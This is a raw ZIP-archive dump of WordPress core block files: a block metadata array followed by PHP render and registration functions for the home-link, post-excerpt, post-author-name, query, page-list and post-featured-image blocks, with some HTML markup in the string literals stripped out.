'__experimentalSelector' => '.wp-block-table > table' ), 'styles' => array( array( 'name' => 'regular', 'label' => 'Default', 'isDefault' => true ), array( 'name' => 'stripes', 'label' => 'Stripes' ) ), 'editorStyle' => 'wp-block-table-editor', 'style' => 'wp-block-table' ), 'tag-cloud' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/tag-cloud', 'title' => 'Tag Cloud', 'category' => 'widgets', 'description' => 'A cloud of your most used tags.', 'textdomain' => 'default', 'attributes' => array( 'numberOfTags' => array( 'type' => 'number', 'default' => 45, 'minimum' => 1, 'maximum' => 100 ), 'taxonomy' => array( 'type' => 'string', 'default' => 'post_tag' ), 'showTagCounts' => array( 'type' => 'boolean', 'default' => false ), 'smallestFontSize' => array( 'type' => 'string', 'default' => '8pt' ), 'largestFontSize' => array( 'type' => 'string', 'default' => '22pt' ) ), 'styles' => array( array( 'name' => 'default', 'label' => 'Default', 'isDefault' => true ), array( 'name' => 'outline', 'label' => 'Outline' ) ), 'supports' => array( 'html' => false, 'align' => true, 'spacing' => array( 'margin' => true, 'padding' => true ), 'typography' => array( 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalLetterSpacing' => true ) ), 'editorStyle' => 'wp-block-tag-cloud-editor' ), 'template-part' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/template-part', 'title' => 'Template Part', 'category' => 'theme', 'description' => 'Edit the different global regions of your site, like the header, footer, sidebar, or create your own.', 'textdomain' => 'default', 'attributes' => array( 'slug' => array( 'type' => 'string' ), 'theme' => array( 'type' => 'string' ), 'tagName' => array( 'type' => 'string' ), 'area' => array( 'type' => 'string' ) ), 'supports' => array( 'align' => true, 'html' => false, 'reusable' => false ), 'editorStyle' => 'wp-block-template-part-editor' ), 'term-description' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/term-description', 'title' => 'Term Description', 'category' => 'theme', 'description' => 'Display the description of categories, tags and custom taxonomies when viewing an archive.', 'textdomain' => 'default', 'attributes' => array( 'textAlign' => array( 'type' => 'string' ) ), 'supports' => array( 'align' => array( 'wide', 'full' ), 'html' => false, 'color' => array( 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ) ), 'spacing' => array( 'padding' => true, 'margin' => true ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ) ), 'text-columns' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/text-columns', 'title' => 'Text Columns (deprecated)', 'icon' => 'columns', 'category' => 'design', 'description' => 'This block is deprecated. Please use the Columns block instead.', 'textdomain' => 'default', 'attributes' => array( 'content' => array( 'type' => 'array', 'source' => 'query', 'selector' => 'p', 'query' => array( 'children' => array( 'type' => 'string', 'source' => 'html' ) ), 'default' => array( array( ), array( ) ) ), 'columns' => array( 'type' => 'number', 'default' => 2 ), 'width' => array( 'type' => 'string' ) ), 'supports' => array( 'inserter' => false ), 'editorStyle' => 'wp-block-text-columns-editor', 'style' => 'wp-block-text-columns' ), 'verse' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/verse', 'title' => 'Verse', 'category' => 'text', 'description' => 'Insert poetry. Use special spacing formats. Or quote song lyrics.', 'keywords' => array( 'poetry', 'poem' ), 'textdomain' => 'default', 'attributes' => array( 'content' => array( 'type' => 'string', 'source' => 'html', 'selector' => 'pre', 'default' => '', '__unstablePreserveWhiteSpace' => true, '__experimentalRole' => 'content' ), 'textAlign' => array( 'type' => 'string' ) ), 'supports' => array( 'anchor' => true, 'color' => array( 'gradients' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ) ), 'typography' => array( 'fontSize' => true, '__experimentalFontFamily' => true, 'lineHeight' => true, '__experimentalFontStyle' => true, '__experimentalFontWeight' => true, '__experimentalLetterSpacing' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalDefaultControls' => array( 'fontSize' => true, 'fontAppearance' => true ) ), 'spacing' => array( 'margin' => true, 'padding' => true, '__experimentalDefaultControls' => array( 'margin' => false, 'padding' => false ) ), '__experimentalBorder' => array( 'radius' => true, 'width' => true, 'color' => true, 'style' => true ) ), 'style' => 'wp-block-verse', 'editorStyle' => 'wp-block-verse-editor' ), 'video' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/video', 'title' => 'Video', 'category' => 'media', 'description' => 'Embed a video from your media library or upload a new one.', 'keywords' => array( 'movie' ), 'textdomain' => 'default', 'attributes' => array( 'autoplay' => array( 'type' => 'boolean', 'source' => 'attribute', 'selector' => 'video', 'attribute' => 'autoplay' ), 'caption' => array( 'type' => 'string', 'source' => 'html', 'selector' => 'figcaption', '__experimentalRole' => 'content' ), 'controls' => array( 'type' => 'boolean', 'source' => 'attribute', 'selector' => 'video', 'attribute' => 'controls', 'default' => true ), 'id' => array( 'type' => 'number', '__experimentalRole' => 'content' ), 'loop' => array( 'type' => 'boolean', 'source' => 'attribute', 'selector' => 'video', 'attribute' => 'loop' ), 'muted' => array( 'type' => 'boolean', 'source' => 'attribute', 'selector' => 'video', 'attribute' => 'muted' ), 'poster' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'video', 'attribute' => 'poster' ), 'preload' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'video', 'attribute' => 'preload', 'default' => 'metadata' ), 'src' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'video', 'attribute' => 'src', '__experimentalRole' => 'content' ), 'playsInline' => array( 'type' => 'boolean', 'source' => 'attribute', 'selector' => 'video', 'attribute' => 'playsinline' ), 'tracks' => array( '__experimentalRole' => 'content', 'type' => 'array', 'items' => array( 'type' => 'object' ), 'default' => array( ) ) ), 'supports' => array( 'anchor' => true, 'align' => true, 'spacing' => array( 'margin' => true, 'padding' => true, '__experimentalDefaultControls' => array( 'margin' => false, 'padding' => false ) ) ), 'editorStyle' => 'wp-block-video-editor', 'style' => 'wp-block-video' ), 'widget-group' => array( 'apiVersion' => 3, 'name' => 'core/widget-group', 'category' => 'widgets', 'attributes' => array( 'title' => array( 'type' => 'string' ) ), 'supports' => array( 'html' => false, 'inserter' => true, 'customClassName' => true, 'reusable' => false ), 'editorStyle' => 'wp-block-widget-group-editor', 'style' => 'wp-block-widget-group' ) );PK7[, home-link.phpnu[ array(), 'inline_styles' => '', ); // Text color. $has_named_text_color = array_key_exists( 'textColor', $context ); $has_custom_text_color = isset( $context['style']['color']['text'] ); // If has text color. if ( $has_custom_text_color || $has_named_text_color ) { // Add has-text-color class. $colors['css_classes'][] = 'has-text-color'; } if ( $has_named_text_color ) { // Add the color class. $colors['css_classes'][] = sprintf( 'has-%s-color', $context['textColor'] ); } elseif ( $has_custom_text_color ) { // Add the custom color inline style. $colors['inline_styles'] .= sprintf( 'color: %s;', $context['style']['color']['text'] ); } // Background color. $has_named_background_color = array_key_exists( 'backgroundColor', $context ); $has_custom_background_color = isset( $context['style']['color']['background'] ); // If has background color. if ( $has_custom_background_color || $has_named_background_color ) { // Add has-background class. $colors['css_classes'][] = 'has-background'; } if ( $has_named_background_color ) { // Add the background-color class. $colors['css_classes'][] = sprintf( 'has-%s-background-color', $context['backgroundColor'] ); } elseif ( $has_custom_background_color ) { // Add the custom background-color inline style. $colors['inline_styles'] .= sprintf( 'background-color: %s;', $context['style']['color']['background'] ); } return $colors; } /** * Build an array with CSS classes and inline styles defining the font sizes * which will be applied to the home link markup in the front-end. * * @param array $context Home link block context. * @return array Font size CSS classes and inline styles. */ function block_core_home_link_build_css_font_sizes( $context ) { // CSS classes. $font_sizes = array( 'css_classes' => array(), 'inline_styles' => '', ); $has_named_font_size = array_key_exists( 'fontSize', $context ); $has_custom_font_size = isset( $context['style']['typography']['fontSize'] ); if ( $has_named_font_size ) { // Add the font size class. $font_sizes['css_classes'][] = sprintf( 'has-%s-font-size', $context['fontSize'] ); } elseif ( $has_custom_font_size ) { // Add the custom font size inline style. $font_sizes['inline_styles'] = sprintf( 'font-size: %s;', $context['style']['typography']['fontSize'] ); } return $font_sizes; } /** * Builds an array with classes and style for the li wrapper * * @param array $context Home link block context. * @return string The li wrapper attributes. */ function block_core_home_link_build_li_wrapper_attributes( $context ) { $colors = block_core_home_link_build_css_colors( $context ); $font_sizes = block_core_home_link_build_css_font_sizes( $context ); $classes = array_merge( $colors['css_classes'], $font_sizes['css_classes'] ); $style_attribute = ( $colors['inline_styles'] . $font_sizes['inline_styles'] ); $classes[] = 'wp-block-navigation-item'; if ( is_front_page() ) { $classes[] = 'current-menu-item'; } elseif ( is_home() && ( (int) get_option( 'page_for_posts' ) !== get_queried_object_id() ) ) { // Edge case where the Reading settings has a posts page set but not a static homepage. $classes[] = 'current-menu-item'; } $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ), 'style' => $style_attribute, ) ); return $wrapper_attributes; } /** * Renders the `core/home-link` block. * * @param array $attributes The block attributes. * @param string $content The saved content. * @param WP_Block $block The parsed block. * * @return string Returns the post content with the home url added. */ function render_block_core_home_link( $attributes, $content, $block ) { if ( empty( $attributes['label'] ) ) { return ''; } $aria_current = ''; if ( is_front_page() ) { $aria_current = ' aria-current="page"'; } elseif ( is_home() && ( (int) get_option( 'page_for_posts' ) !== get_queried_object_id() ) ) { // Edge case where the Reading settings has a posts page set but not a static homepage. $aria_current = ' aria-current="page"'; } return sprintf( '
    1. %4$s
    2. ', block_core_home_link_build_li_wrapper_attributes( $block->context ), esc_url( home_url() ), $aria_current, wp_kses_post( $attributes['label'] ) ); } /** * Register the home block * * @uses render_block_core_home_link() * @throws WP_Error An WP_Error exception parsing the block definition. */ function register_block_core_home_link() { register_block_type_from_metadata( __DIR__ . '/home-link', array( 'render_callback' => 'render_block_core_home_link', ) ); } add_action( 'init', 'register_block_core_home_link' ); PK7[WQ Q post-excerpt.phpnu[context['postId'] ) ) { return ''; } /* * The purpose of the excerpt length setting is to limit the length of both * automatically generated and user-created excerpts. * Because the excerpt_length filter only applies to auto generated excerpts, * wp_trim_words is used instead. */ $excerpt_length = $attributes['excerptLength']; $excerpt = get_the_excerpt( $block->context['postId'] ); if ( isset( $excerpt_length ) ) { $excerpt = wp_trim_words( $excerpt, $excerpt_length ); } $more_text = ! empty( $attributes['moreText'] ) ? '' . wp_kses_post( $attributes['moreText'] ) . '' : ''; $filter_excerpt_more = static function ( $more ) use ( $more_text ) { return empty( $more_text ) ? $more : ''; }; /** * Some themes might use `excerpt_more` filter to handle the * `more` link displayed after a trimmed excerpt. Since the * block has a `more text` attribute we have to check and * override if needed the return value from this filter. * So if the block's attribute is not empty override the * `excerpt_more` filter and return nothing. This will * result in showing only one `read more` link at a time. */ add_filter( 'excerpt_more', $filter_excerpt_more ); $classes = array(); if ( isset( $attributes['textAlign'] ) ) { $classes[] = 'has-text-align-' . $attributes['textAlign']; } if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) { $classes[] = 'has-link-color'; } $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) ); $content = '

      ' . $excerpt; $show_more_on_new_line = ! isset( $attributes['showMoreOnNewLine'] ) || $attributes['showMoreOnNewLine']; if ( $show_more_on_new_line && ! empty( $more_text ) ) { $content .= '

      ' . $more_text . '

      '; } else { $content .= " $more_text

      "; } remove_filter( 'excerpt_more', $filter_excerpt_more ); return sprintf( '
      %2$s
      ', $wrapper_attributes, $content ); } /** * Registers the `core/post-excerpt` block on the server. */ function register_block_core_post_excerpt() { register_block_type_from_metadata( __DIR__ . '/post-excerpt', array( 'render_callback' => 'render_block_core_post_excerpt', ) ); } add_action( 'init', 'register_block_core_post_excerpt' ); /** * If themes or plugins filter the excerpt_length, we need to * override the filter in the editor, otherwise * the excerpt length block setting has no effect. * Returns 100 because 100 is the max length in the setting. */ if ( is_admin() || defined( 'REST_REQUEST' ) && REST_REQUEST ) { add_filter( 'excerpt_length', static function () { return 100; }, PHP_INT_MAX ); } PK7[-spost-author-name.phpnu[context['postId'] ) ) { return ''; } $author_id = get_post_field( 'post_author', $block->context['postId'] ); if ( empty( $author_id ) ) { return ''; } $author_name = get_the_author_meta( 'display_name', $author_id ); if ( isset( $attributes['isLink'] ) && $attributes['isLink'] ) { $author_name = sprintf( '', get_author_posts_url( $author_id ), esc_attr( $attributes['linkTarget'] ), $author_name ); } $classes = array(); if ( isset( $attributes['textAlign'] ) ) { $classes[] = 'has-text-align-' . $attributes['textAlign']; } if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) { $classes[] = 'has-link-color'; } $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) ); return sprintf( '
      %2$s
      ', $wrapper_attributes, $author_name ); } /** * Registers the `core/post-author-name` block on the server. */ function register_block_core_post_author_name() { register_block_type_from_metadata( __DIR__ . '/post-author-name', array( 'render_callback' => 'render_block_core_post_author_name', ) ); } add_action( 'init', 'register_block_core_post_author_name' ); PK7[Wc query.phpnu[next_tag() ) { // Add the necessary directives. $p->set_attribute( 'data-wp-interactive', true ); $p->set_attribute( 'data-wp-navigation-id', 'query-' . $attributes['queryId'] ); // Use context to send translated strings. $p->set_attribute( 'data-wp-context', wp_json_encode( array( 'core' => array( 'query' => array( 'loadingText' => __( 'Loading page, please wait.' ), 'loadedText' => __( 'Page Loaded.' ), ), ), ), JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_AMP ) ); $content = $p->get_updated_html(); // Mark the block as interactive. $block->block_type->supports['interactivity'] = true; // Add a div to announce messages using `aria-live`. $html_tag = 'div'; if ( ! empty( $attributes['tagName'] ) ) { $html_tag = esc_attr( $attributes['tagName'] ); } $last_tag_position = strripos( $content, '' ); $content = substr_replace( $content, '
      ', $last_tag_position, 0 ); } } $view_asset = 'wp-block-query-view'; if ( ! wp_script_is( $view_asset ) ) { $script_handles = $block->block_type->view_script_handles; // If the script is not needed, and it is still in the `view_script_handles`, remove it. if ( ( ! $attributes['enhancedPagination'] || ! isset( $attributes['queryId'] ) ) && in_array( $view_asset, $script_handles, true ) ) { $block->block_type->view_script_handles = array_diff( $script_handles, array( $view_asset ) ); } // If the script is needed, but it was previously removed, add it again. if ( $attributes['enhancedPagination'] && isset( $attributes['queryId'] ) && ! in_array( $view_asset, $script_handles, true ) ) { $block->block_type->view_script_handles = array_merge( $script_handles, array( $view_asset ) ); } } $style_asset = 'wp-block-query'; if ( ! wp_style_is( $style_asset ) ) { $style_handles = $block->block_type->style_handles; // If the styles are not needed, and they are still in the `style_handles`, remove them. if ( ( ! $attributes['enhancedPagination'] || ! isset( $attributes['queryId'] ) ) && in_array( $style_asset, $style_handles, true ) ) { $block->block_type->style_handles = array_diff( $style_handles, array( $style_asset ) ); } // If the styles are needed, but they were previously removed, add them again. if ( $attributes['enhancedPagination'] && isset( $attributes['queryId'] ) && ! in_array( $style_asset, $style_handles, true ) ) { $block->block_type->style_handles = array_merge( $style_handles, array( $style_asset ) ); } } return $content; } /** * Ensure that the view script has the `wp-interactivity` dependency. * * @since 6.4.0 * * @global WP_Scripts $wp_scripts */ function block_core_query_ensure_interactivity_dependency() { global $wp_scripts; if ( isset( $wp_scripts->registered['wp-block-query-view'] ) && ! in_array( 'wp-interactivity', $wp_scripts->registered['wp-block-query-view']->deps, true ) ) { $wp_scripts->registered['wp-block-query-view']->deps[] = 'wp-interactivity'; } } add_action( 'wp_print_scripts', 'block_core_query_ensure_interactivity_dependency' ); /** * Registers the `core/query` block on the server. */ function register_block_core_query() { register_block_type_from_metadata( __DIR__ . '/query', array( 'render_callback' => 'render_block_core_query', ) ); } add_action( 'init', 'register_block_core_query' ); /** * Traverse the tree of blocks looking for any plugin block (i.e., a block from * an installed plugin) inside a Query block with the enhanced pagination * enabled. If at least one is found, the enhanced pagination is effectively * disabled to prevent any potential incompatibilities. * * @since 6.4.0 * * @param array $parsed_block The block being rendered. * @return string Returns the parsed block, unmodified. */ function block_core_query_disable_enhanced_pagination( $parsed_block ) { static $enhanced_query_stack = array(); static $dirty_enhanced_queries = array(); static $render_query_callback = null; $block_name = $parsed_block['blockName']; if ( 'core/query' === $block_name && isset( $parsed_block['attrs']['enhancedPagination'] ) && true === $parsed_block['attrs']['enhancedPagination'] && isset( $parsed_block['attrs']['queryId'] ) ) { $enhanced_query_stack[] = $parsed_block['attrs']['queryId']; if ( ! isset( $render_query_callback ) ) { /** * Filter that disables the enhanced pagination feature during block * rendering when a plugin block has been found inside. It does so * by adding an attribute called `data-wp-navigation-disabled` which * is later handled by the front-end logic. * * @param string $content The block content. * @param array $block The full block, including name and attributes. * @return string Returns the modified output of the query block. */ $render_query_callback = static function ( $content, $block ) use ( &$enhanced_query_stack, &$dirty_enhanced_queries, &$render_query_callback ) { $has_enhanced_pagination = isset( $block['attrs']['enhancedPagination'] ) && true === $block['attrs']['enhancedPagination'] && isset( $block['attrs']['queryId'] ); if ( ! $has_enhanced_pagination ) { return $content; } if ( isset( $dirty_enhanced_queries[ $block['attrs']['queryId'] ] ) ) { $p = new WP_HTML_Tag_Processor( $content ); if ( $p->next_tag() ) { $p->set_attribute( 'data-wp-navigation-disabled', 'true' ); } $content = $p->get_updated_html(); $dirty_enhanced_queries[ $block['attrs']['queryId'] ] = null; } array_pop( $enhanced_query_stack ); if ( empty( $enhanced_query_stack ) ) { remove_filter( 'render_block_core/query', $render_query_callback ); $render_query_callback = null; } return $content; }; add_filter( 'render_block_core/query', $render_query_callback, 10, 2 ); } } elseif ( ! empty( $enhanced_query_stack ) && isset( $block_name ) && ( ! str_starts_with( $block_name, 'core/' ) || 'core/post-content' === $block_name ) ) { foreach ( $enhanced_query_stack as $query_id ) { $dirty_enhanced_queries[ $query_id ] = true; } } return $parsed_block; } add_filter( 'render_block_data', 'block_core_query_disable_enhanced_pagination', 10, 1 ); PK7[yu44 page-list.phpnu[ array(), 'inline_styles' => '', 'overlay_css_classes' => array(), 'overlay_inline_styles' => '', ); // Text color. $has_named_text_color = array_key_exists( 'textColor', $context ); $has_picked_text_color = array_key_exists( 'customTextColor', $context ); $has_custom_text_color = isset( $context['style']['color']['text'] ); // If has text color. if ( $has_custom_text_color || $has_picked_text_color || $has_named_text_color ) { // Add has-text-color class. $colors['css_classes'][] = 'has-text-color'; } if ( $has_named_text_color ) { // Add the color class. $colors['css_classes'][] = sprintf( 'has-%s-color', _wp_to_kebab_case( $context['textColor'] ) ); } elseif ( $has_picked_text_color ) { $colors['inline_styles'] .= sprintf( 'color: %s;', $context['customTextColor'] ); } elseif ( $has_custom_text_color ) { // Add the custom color inline style. $colors['inline_styles'] .= sprintf( 'color: %s;', $context['style']['color']['text'] ); } // Background color. $has_named_background_color = array_key_exists( 'backgroundColor', $context ); $has_picked_background_color = array_key_exists( 'customBackgroundColor', $context ); $has_custom_background_color = isset( $context['style']['color']['background'] ); // If has background color. if ( $has_custom_background_color || $has_picked_background_color || $has_named_background_color ) { // Add has-background class. $colors['css_classes'][] = 'has-background'; } if ( $has_named_background_color ) { // Add the background-color class. $colors['css_classes'][] = sprintf( 'has-%s-background-color', _wp_to_kebab_case( $context['backgroundColor'] ) ); } elseif ( $has_picked_background_color ) { $colors['inline_styles'] .= sprintf( 'background-color: %s;', $context['customBackgroundColor'] ); } elseif ( $has_custom_background_color ) { // Add the custom background-color inline style. $colors['inline_styles'] .= sprintf( 'background-color: %s;', $context['style']['color']['background'] ); } // Overlay text color. $has_named_overlay_text_color = array_key_exists( 'overlayTextColor', $context ); $has_picked_overlay_text_color = array_key_exists( 'customOverlayTextColor', $context ); // If it has a text color. if ( $has_named_overlay_text_color || $has_picked_overlay_text_color ) { $colors['overlay_css_classes'][] = 'has-text-color'; } // Give overlay colors priority, fall back to Navigation block colors, then global styles. if ( $has_named_overlay_text_color ) { $colors['overlay_css_classes'][] = sprintf( 'has-%s-color', _wp_to_kebab_case( $context['overlayTextColor'] ) ); } elseif ( $has_picked_overlay_text_color ) { $colors['overlay_inline_styles'] .= sprintf( 'color: %s;', $context['customOverlayTextColor'] ); } // Overlay background colors. $has_named_overlay_background_color = array_key_exists( 'overlayBackgroundColor', $context ); $has_picked_overlay_background_color = array_key_exists( 'customOverlayBackgroundColor', $context ); // If has background color. if ( $has_named_overlay_background_color || $has_picked_overlay_background_color ) { $colors['overlay_css_classes'][] = 'has-background'; } if ( $has_named_overlay_background_color ) { $colors['overlay_css_classes'][] = sprintf( 'has-%s-background-color', _wp_to_kebab_case( $context['overlayBackgroundColor'] ) ); } elseif ( $has_picked_overlay_background_color ) { $colors['overlay_inline_styles'] .= sprintf( 'background-color: %s;', $context['customOverlayBackgroundColor'] ); } return $colors; } /** * Build an array with CSS classes and inline styles defining the font sizes * which will be applied to the pages markup in the front-end when it is a descendant of navigation. * * @param array $context Navigation block context. * @return array Font size CSS classes and inline styles. */ function block_core_page_list_build_css_font_sizes( $context ) { // CSS classes. $font_sizes = array( 'css_classes' => array(), 'inline_styles' => '', ); $has_named_font_size = array_key_exists( 'fontSize', $context ); $has_custom_font_size = isset( $context['style']['typography']['fontSize'] ); if ( $has_named_font_size ) { // Add the font size class. $font_sizes['css_classes'][] = sprintf( 'has-%s-font-size', $context['fontSize'] ); } elseif ( $has_custom_font_size ) { // Add the custom font size inline style. $font_sizes['inline_styles'] = sprintf( 'font-size: %s;', wp_get_typography_font_size_value( array( 'size' => $context['style']['typography']['fontSize'], ) ) ); } return $font_sizes; } /** * Outputs Page list markup from an array of pages with nested children. * * @param boolean $open_submenus_on_click Whether to open submenus on click instead of hover. * @param boolean $show_submenu_icons Whether to show submenu indicator icons. * @param boolean $is_navigation_child If block is a child of Navigation block. * @param array $nested_pages The array of nested pages. * @param boolean $is_nested Whether the submenu is nested or not. * @param array $active_page_ancestor_ids An array of ancestor ids for active page. * @param array $colors Color information for overlay styles. * @param integer $depth The nesting depth. * * @return string List markup. */ function block_core_page_list_render_nested_page_list( $open_submenus_on_click, $show_submenu_icons, $is_navigation_child, $nested_pages, $is_nested, $active_page_ancestor_ids = array(), $colors = array(), $depth = 0 ) { if ( empty( $nested_pages ) ) { return; } $front_page_id = (int) get_option( 'page_on_front' ); $markup = ''; foreach ( (array) $nested_pages as $page ) { $css_class = $page['is_active'] ? ' current-menu-item' : ''; $aria_current = $page['is_active'] ? ' aria-current="page"' : ''; $style_attribute = ''; $css_class .= in_array( $page['page_id'], $active_page_ancestor_ids, true ) ? ' current-menu-ancestor' : ''; if ( isset( $page['children'] ) ) { $css_class .= ' has-child'; } if ( $is_navigation_child ) { $css_class .= ' wp-block-navigation-item'; if ( $open_submenus_on_click ) { $css_class .= ' open-on-click'; } elseif ( $show_submenu_icons ) { $css_class .= ' open-on-hover-click'; } } $navigation_child_content_class = $is_navigation_child ? ' wp-block-navigation-item__content' : ''; // If this is the first level of submenus, include the overlay colors. if ( ( ( 0 < $depth && ! $is_nested ) || $is_nested ) && isset( $colors['overlay_css_classes'], $colors['overlay_inline_styles'] ) ) { $css_class .= ' ' . trim( implode( ' ', $colors['overlay_css_classes'] ) ); if ( '' !== $colors['overlay_inline_styles'] ) { $style_attribute = sprintf( ' style="%s"', esc_attr( $colors['overlay_inline_styles'] ) ); } } if ( (int) $page['page_id'] === $front_page_id ) { $css_class .= ' menu-item-home'; } $title = wp_kses_post( $page['title'] ); $aria_label = sprintf( /* translators: Accessibility text. %s: Parent page title. */ __( '%s submenu' ), wp_strip_all_tags( $title ) ); $markup .= '
    3. '; if ( isset( $page['children'] ) && $is_navigation_child && $open_submenus_on_click ) { $markup .= ''; } else { $markup .= '' . $title . ''; } if ( isset( $page['children'] ) ) { if ( $is_navigation_child && $show_submenu_icons && ! $open_submenus_on_click ) { $markup .= ''; } $markup .= '
        '; $markup .= block_core_page_list_render_nested_page_list( $open_submenus_on_click, $show_submenu_icons, $is_navigation_child, $page['children'], $is_nested, $active_page_ancestor_ids, $colors, $depth + 1 ); $markup .= '
      '; } $markup .= '
    4. '; } return $markup; } /** * Outputs nested array of pages * * @param array $current_level The level being iterated through. * @param array $children The children grouped by parent post ID. * * @return array The nested array of pages. */ function block_core_page_list_nest_pages( $current_level, $children ) { if ( empty( $current_level ) ) { return; } foreach ( (array) $current_level as $key => $current ) { if ( isset( $children[ $key ] ) ) { $current_level[ $key ]['children'] = block_core_page_list_nest_pages( $children[ $key ], $children ); } } return $current_level; } /** * Renders the `core/page-list` block on server. * * @param array $attributes The block attributes. * @param string $content The saved content. * @param WP_Block $block The parsed block. * * @return string Returns the page list markup. */ function render_block_core_page_list( $attributes, $content, $block ) { static $block_id = 0; ++$block_id; $parent_page_id = $attributes['parentPageID']; $is_nested = $attributes['isNested']; $all_pages = get_pages( array( 'sort_column' => 'menu_order,post_title', 'order' => 'asc', ) ); // If there are no pages, there is nothing to show. if ( empty( $all_pages ) ) { return; } $top_level_pages = array(); $pages_with_children = array(); $active_page_ancestor_ids = array(); foreach ( (array) $all_pages as $page ) { $is_active = ! empty( $page->ID ) && ( get_queried_object_id() === $page->ID ); if ( $is_active ) { $active_page_ancestor_ids = get_post_ancestors( $page->ID ); } if ( $page->post_parent ) { $pages_with_children[ $page->post_parent ][ $page->ID ] = array( 'page_id' => $page->ID, 'title' => $page->post_title, 'link' => get_permalink( $page ), 'is_active' => $is_active, ); } else { $top_level_pages[ $page->ID ] = array( 'page_id' => $page->ID, 'title' => $page->post_title, 'link' => get_permalink( $page ), 'is_active' => $is_active, ); } } $colors = block_core_page_list_build_css_colors( $attributes, $block->context ); $font_sizes = block_core_page_list_build_css_font_sizes( $block->context ); $classes = array_merge( $colors['css_classes'], $font_sizes['css_classes'] ); $style_attribute = ( $colors['inline_styles'] . $font_sizes['inline_styles'] ); $css_classes = trim( implode( ' ', $classes ) ); $nested_pages = block_core_page_list_nest_pages( $top_level_pages, $pages_with_children ); if ( 0 !== $parent_page_id ) { // If the parent page has no child pages, there is nothing to show. if ( ! array_key_exists( $parent_page_id, $pages_with_children ) ) { return; } $nested_pages = block_core_page_list_nest_pages( $pages_with_children[ $parent_page_id ], $pages_with_children ); } $is_navigation_child = array_key_exists( 'showSubmenuIcon', $block->context ); $open_submenus_on_click = array_key_exists( 'openSubmenusOnClick', $block->context ) ? $block->context['openSubmenusOnClick'] : false; $show_submenu_icons = array_key_exists( 'showSubmenuIcon', $block->context ) ? $block->context['showSubmenuIcon'] : false; $wrapper_markup = $is_nested ? '%2$s' : '
        %2$s
      '; $items_markup = block_core_page_list_render_nested_page_list( $open_submenus_on_click, $show_submenu_icons, $is_navigation_child, $nested_pages, $is_nested, $active_page_ancestor_ids, $colors ); $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $css_classes, 'style' => $style_attribute, ) ); return sprintf( $wrapper_markup, $wrapper_attributes, $items_markup ); } /** * Registers the `core/pages` block on server. */ function register_block_core_page_list() { register_block_type_from_metadata( __DIR__ . '/page-list', array( 'render_callback' => 'render_block_core_page_list', ) ); } add_action( 'init', 'register_block_core_page_list' ); PK7[>ԯpost-featured-image.phpnu[context['postId'] ) ) { return ''; } $post_ID = $block->context['postId']; $is_link = isset( $attributes['isLink'] ) && $attributes['isLink']; $size_slug = isset( $attributes['sizeSlug'] ) ? $attributes['sizeSlug'] : 'post-thumbnail'; $attr = get_block_core_post_featured_image_border_attributes( $attributes ); $overlay_markup = get_block_core_post_featured_image_overlay_element_markup( $attributes ); if ( $is_link ) { if ( get_the_title( $post_ID ) ) { $attr['alt'] = trim( strip_tags( get_the_title( $post_ID ) ) ); } else { $attr['alt'] = sprintf( // translators: %d is the post ID. __( 'Untitled post %d' ), $post_ID ); } } $extra_styles = ''; // Aspect ratio with a height set needs to override the default width/height. if ( ! empty( $attributes['aspectRatio'] ) ) { $extra_styles .= 'width:100%;height:100%;'; } elseif ( ! empty( $attributes['height'] ) ) { $extra_styles .= "height:{$attributes['height']};"; } if ( ! empty( $attributes['scale'] ) ) { $extra_styles .= "object-fit:{$attributes['scale']};"; } if ( ! empty( $extra_styles ) ) { $attr['style'] = empty( $attr['style'] ) ? $extra_styles : $attr['style'] . $extra_styles; } $featured_image = get_the_post_thumbnail( $post_ID, $size_slug, $attr ); if ( ! $featured_image ) { return ''; } if ( $is_link ) { $link_target = $attributes['linkTarget']; $rel = ! empty( $attributes['rel'] ) ? 'rel="' . esc_attr( $attributes['rel'] ) . '"' : ''; $height = ! empty( $attributes['height'] ) ? 'style="' . esc_attr( safecss_filter_attr( 'height:' . $attributes['height'] ) ) . '"' : ''; $featured_image = sprintf( '%5$s%6$s', get_the_permalink( $post_ID ), esc_attr( $link_target ), $rel, $height, $featured_image, $overlay_markup ); } else { $featured_image = $featured_image . $overlay_markup; } $aspect_ratio = ! empty( $attributes['aspectRatio'] ) ? esc_attr( safecss_filter_attr( 'aspect-ratio:' . $attributes['aspectRatio'] ) ) . ';' : ''; $width = ! empty( $attributes['width'] ) ? esc_attr( safecss_filter_attr( 'width:' . $attributes['width'] ) ) . ';' : ''; $height = ! empty( $attributes['height'] ) ? esc_attr( safecss_filter_attr( 'height:' . $attributes['height'] ) ) . ';' : ''; if ( ! $height && ! $width && ! $aspect_ratio ) { $wrapper_attributes = get_block_wrapper_attributes(); } else { $wrapper_attributes = get_block_wrapper_attributes( array( 'style' => $aspect_ratio . $width . $height ) ); } return "
      {$featured_image}
